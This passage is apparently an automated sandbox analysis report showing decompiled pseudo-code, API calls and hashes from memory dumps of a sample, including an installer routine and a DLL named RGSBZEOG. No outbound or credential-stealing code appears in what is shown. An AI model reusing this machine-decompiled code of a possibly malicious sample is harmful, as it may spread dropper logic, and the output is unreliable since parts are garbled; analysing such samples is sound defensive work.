                                                                                              				if((_t49[5] & 0x00000008) != 0) {
                                                                                              					_t37 = GetSysColor(_t37);
                                                                                              					_v16.lbColor = _t37;
                                                                                              				}
                                                                                              				if((_t49[5] & 0x00000004) != 0) {
                                                                                              					SetBkColor(_a8, _t37);
                                                                                              				}
                                                                                              				if((_t49[5] & 0x00000010) != 0) {
                                                                                              					_v16.lbStyle = _t49[2];
                                                                                              					_t40 = _t49[3];
                                                                                              					if(_t40 != 0) {
                                                                                              						DeleteObject(_t40);
                                                                                              					}
                                                                                              					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                              				}
                                                                                              				return _t49[3];
                                                                                              			}









                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(?,?,?), ref: 6F1D1B9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 3462415225-3633984987
                                                                                              • Opcode ID: e812cb45086aec6419ceff232df965012f985e6f59eb3da8c2f978f21565681d
                                                                                              • Instruction ID: c1a29a0dedb1a29bedfcc52cb89c2bb2d49e81f8dc362695a0e4e3e0361a12c3
                                                                                              • Opcode Fuzzy Hash: e812cb45086aec6419ceff232df965012f985e6f59eb3da8c2f978f21565681d
                                                                                              • Instruction Fuzzy Hash: B771D9B8600209AFCB04CF58C594EAABBB5FF88394F15C158FD498B355D731EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0040266E(struct _OVERLAPPED* __ebx) {
                                                                                              				void* _t27;
                                                                                              				long _t32;
                                                                                              				struct _OVERLAPPED* _t47;
                                                                                              				void* _t51;
                                                                                              				void* _t53;
                                                                                              				void* _t56;
                                                                                              				void* _t57;
                                                                                              				void* _t58;
                                                                                              
                                                                                              				_t47 = __ebx;
                                                                                              				 *(_t58 - 8) = 0xfffffd66;
                                                                                              				_t52 = E004029E8(0xfffffff0);
                                                                                              				 *(_t58 - 0x44) = _t24;
                                                                                              				if(E0040548B(_t52) == 0) {
                                                                                              					E004029E8(0xffffffed);
                                                                                              				}
                                                                                              				E004055E3(_t52);
                                                                                              				_t27 = E00405602(_t52, 0x40000000, 2);
                                                                                              				 *(_t58 + 8) = _t27;
                                                                                              				if(_t27 != 0xffffffff) {
                                                                                              					_t32 =  *0x42eb74; // 0x34000
                                                                                              					 *(_t58 - 0x2c) = _t32;
                                                                                              					_t51 = GlobalAlloc(0x40, _t32);
                                                                                              					if(_t51 != _t47) {
                                                                                              						E00403098(_t47);
                                                                                              						E00403066(_t51,  *(_t58 - 0x2c));
                                                                                              						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                              						 *(_t58 - 0x30) = _t56;
                                                                                              						if(_t56 != _t47) {
                                                                                              							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                                                              							while( *_t56 != _t47) {
                                                                                              								_t49 =  *_t56;
                                                                                              								_t57 = _t56 + 8;
                                                                                              								 *(_t58 - 0x38) =  *_t56;
                                                                                              								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                              								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                              							}
                                                                                              							GlobalFree( *(_t58 - 0x30));
                                                                                              						}
                                                                                              						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                                                              						GlobalFree(_t51);
                                                                                              						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                              					}
                                                                                              					CloseHandle( *(_t58 + 8));
                                                                                              				}
                                                                                              				_t53 = 0xfffffff3;
                                                                                              				if( *(_t58 - 8) < _t47) {
                                                                                              					_t53 = 0xffffffef;
                                                                                              					DeleteFileA( *(_t58 - 0x44));
                                                                                              					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                              				}
                                                                                              				_push(_t53);
                                                                                              				E00401423();
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
                                                                                              				return 0;
                                                                                              			}












                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00034000,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                                                              • GlobalFree.KERNEL32 ref: 00402717
                                                                                              • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                                                              • GlobalFree.KERNEL32 ref: 00402730
                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3294113728-0
                                                                                              • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                              • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                                                                              • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                              • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00404CC9(CHAR* _a4, CHAR* _a8) {
                                                                                              				struct HWND__* _v8;
                                                                                              				signed int _v12;
                                                                                              				CHAR* _v32;
                                                                                              				long _v44;
                                                                                              				int _v48;
                                                                                              				void* _v52;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				CHAR* _t26;
                                                                                              				signed int _t27;
                                                                                              				CHAR* _t28;
                                                                                              				long _t29;
                                                                                              				signed int _t39;
                                                                                              
                                                                                              				_t26 =  *0x42e344; // 0x0
                                                                                              				_v8 = _t26;
                                                                                              				if(_t26 != 0) {
                                                                                              					_t27 =  *0x42ec14; // 0x0
                                                                                              					_v12 = _t27;
                                                                                              					_t39 = _t27 & 0x00000001;
                                                                                              					if(_t39 == 0) {
                                                                                              						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
                                                                                              					}
                                                                                              					_t26 = lstrlenA(0x4297b0);
                                                                                              					_a4 = _t26;
                                                                                              					if(_a8 == 0) {
                                                                                              						L6:
                                                                                              						if((_v12 & 0x00000004) == 0) {
                                                                                              							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                                                                                              						}
                                                                                              						if((_v12 & 0x00000002) == 0) {
                                                                                              							_v32 = 0x4297b0;
                                                                                              							_v52 = 1;
                                                                                              							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                              							_v44 = 0;
                                                                                              							_v48 = _t29 - _t39;
                                                                                              							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                              							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                              						}
                                                                                              						if(_t39 != 0) {
                                                                                              							_t28 = _a4;
                                                                                              							 *((char*)(_t28 + 0x4297b0)) = 0;
                                                                                              							return _t28;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                              						if(_t26 < 0x800) {
                                                                                              							_t26 = lstrcatA(0x4297b0, _a8);
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t26;
                                                                                              			}


















                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                              • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                              • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                              • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                              • SendMessageA.USER32 ref: 00404D5D
                                                                                              • SendMessageA.USER32 ref: 00404D77
                                                                                              • SendMessageA.USER32 ref: 00404D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2531174081-0
                                                                                              • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                              • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                                                                              • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                              • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                                                                                              				long _v8;
                                                                                              				signed char _v12;
                                                                                              				unsigned int _v16;
                                                                                              				void* _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				long _v56;
                                                                                              				void* _v60;
                                                                                              				long _t15;
                                                                                              				unsigned int _t19;
                                                                                              				signed int _t25;
                                                                                              				struct HWND__* _t28;
                                                                                              
                                                                                              				_t28 = _a4;
                                                                                              				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                              				if(_a8 == 0) {
                                                                                              					L4:
                                                                                              					_v56 = _t15;
                                                                                              					_v60 = 4;
                                                                                              					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                              					return _v24;
                                                                                              				}
                                                                                              				_t19 = GetMessagePos();
                                                                                              				_v16 = _t19 >> 0x10;
                                                                                              				_v20 = _t19;
                                                                                              				ScreenToClient(_t28,  &_v20);
                                                                                              				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                              				if((_v12 & 0x00000066) != 0) {
                                                                                              					_t15 = _v8;
                                                                                              					goto L4;
                                                                                              				}
                                                                                              				return _t25 | 0xffffffff;
                                                                                              			}















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                                                                              				char _v68;
                                                                                              				int _t11;
                                                                                              				int _t20;
                                                                                              
                                                                                              				if(_a8 == 0x110) {
                                                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                                                              					_a8 = 0x113;
                                                                                              				}
                                                                                              				if(_a8 == 0x113) {
                                                                                              					_t20 =  *0x414b78; // 0xd0131
                                                                                              					_t11 =  *0x428b88; // 0xd0135
                                                                                              					if(_t20 >= _t11) {
                                                                                              						_t20 = _t11;
                                                                                              					}
                                                                                              					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                              					SetWindowTextA(_a4,  &_v68);
                                                                                              					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}

                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                                                              • MulDiv.KERNEL32(000D0131,00000064,000D0135), ref: 00402B73
                                                                                              • wsprintfA.USER32 ref: 00402B83
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402B93
                                                                                              • SetDlgItemTextA.USER32 ref: 00402BA5
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402B7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                              • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                                                                              • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                              • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 21%
                                                                                              			E6F1D1440(void* _a4, signed int* _a8, signed short* _a12) {
                                                                                              				signed char* _v8;
                                                                                              				signed char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _t147;
                                                                                              				signed short* _t162;
                                                                                              				intOrPtr _t225;
                                                                                              				void* _t262;
                                                                                              				void* _t263;
                                                                                              				void* _t264;
                                                                                              				void* _t265;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                              				_v28 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v24 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				_t263 = _t262 + 0x10;
                                                                                              				_t225 = _a4;
                                                                                              				_t267 =  *((intOrPtr*)(_t225 + 0x34));
                                                                                              				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v36 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F1D5070(_t267, _a4, _a8, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					0x6f1d0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
                                                                                              					_t263 = _t263 + 8;
                                                                                              					_v28 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
                                                                                              				}
                                                                                              				E6F1D7400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t264 = _t263 + 8;
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v12 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                              				if(_v8 != 0) {
                                                                                              					_t162 = _a12;
                                                                                              					0x6f1d0000(_a4, _t162);
                                                                                              					_v40 = _t162;
                                                                                              					E6F1DD120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                              					_t264 = _t264 + 0x18;
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				_t147 = E6F1D8F30(_a4, _a8, _a12, _v12);
                                                                                              				_t265 = _t264 + 0x10;
                                                                                              				_a8 = _t147;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
                                                                                              					E6F1DD360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                              					_t265 = _t265 + 0x14;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                              				if(_v28 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              				}
                                                                                              				do {
                                                                                              					0x6f1d0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              					_t265 = _t265 + 0xc;
                                                                                              					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                              						0x6f1d0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              						_t265 = _t265 + 8;
                                                                                              					}
                                                                                              				} while (0 != 0);
                                                                                              				return 0;
                                                                                              			}

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F1D14DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                              • API String ID: 1319815426-1841717460
                                                                                              • Opcode ID: b5d737de0f4f03bff0e0e1560ce75073511ada061054ec597d08d6d680120dd4
                                                                                              • Instruction ID: 1a86f5574880af7e995a3762d3a819bed6891e45de6e808e0e61acb9ac7c9e9e
                                                                                              • Opcode Fuzzy Hash: b5d737de0f4f03bff0e0e1560ce75073511ada061054ec597d08d6d680120dd4
                                                                                              • Instruction Fuzzy Hash: E5A1D6B8A00209AFDB08CF58C590AAEBBB5FF88354F148159FD199B355D731EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E6F1D47D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				char _v48;
                                                                                              				void* _t183;
                                                                                              				void* _t186;
                                                                                              				void* _t187;
                                                                                              				void* _t188;
                                                                                              
                                                                                              				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
                                                                                              				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
                                                                                              				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
                                                                                              				_v8 = 0;
                                                                                              				0x6f1d0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				0x6f1d0000("index=%d\n", _v20);
                                                                                              				_t131 = _a4;
                                                                                              				E6F1DE8C0(_a4, 2, _a12,  &_v48);
                                                                                              				_t186 = _t183 + 0x2c;
                                                                                              				if((_v12 & 0x000000c0) == 0) {
                                                                                              					E6F1D73D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
                                                                                              					_t187 = _t186 + 8;
                                                                                              				} else {
                                                                                              					E6F1D73D0(_t131, _a4 + 4, 4);
                                                                                              					_t188 = _t186 + 8;
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
                                                                                              					_t153 = _a4;
                                                                                              					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
                                                                                              						_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              						_t153 = _a4;
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              					}
                                                                                              					E6F1D73D0(_t153, _a4 + 4, 8);
                                                                                              					_t187 = _t188 + 8;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f1d0000(_a4, _v16);
                                                                                              					E6F1E0730( *_a8, 0, _v16);
                                                                                              					_t187 = _t187 + 0xc;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
                                                                                              				if(_v8 != 0) {
                                                                                              					do {
                                                                                              						0x6f1d0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              						_t187 = _t187 + 0xc;
                                                                                              						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                              							0x6f1d0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              							_t187 = _t187 + 8;
                                                                                              						}
                                                                                              					} while (0 != 0);
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}













                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                              • API String ID: 2102423945-3620127348
                                                                                              • Opcode ID: 695b2f8741ebe04e656ac39a49d939df359a106a96810eed936e0e386fca122b
                                                                                              • Instruction ID: f7dd3bec86d8868c66ff564f472e6a9e9e6819e473c80a112ce86286e8a3b184
                                                                                              • Opcode Fuzzy Hash: 695b2f8741ebe04e656ac39a49d939df359a106a96810eed936e0e386fca122b
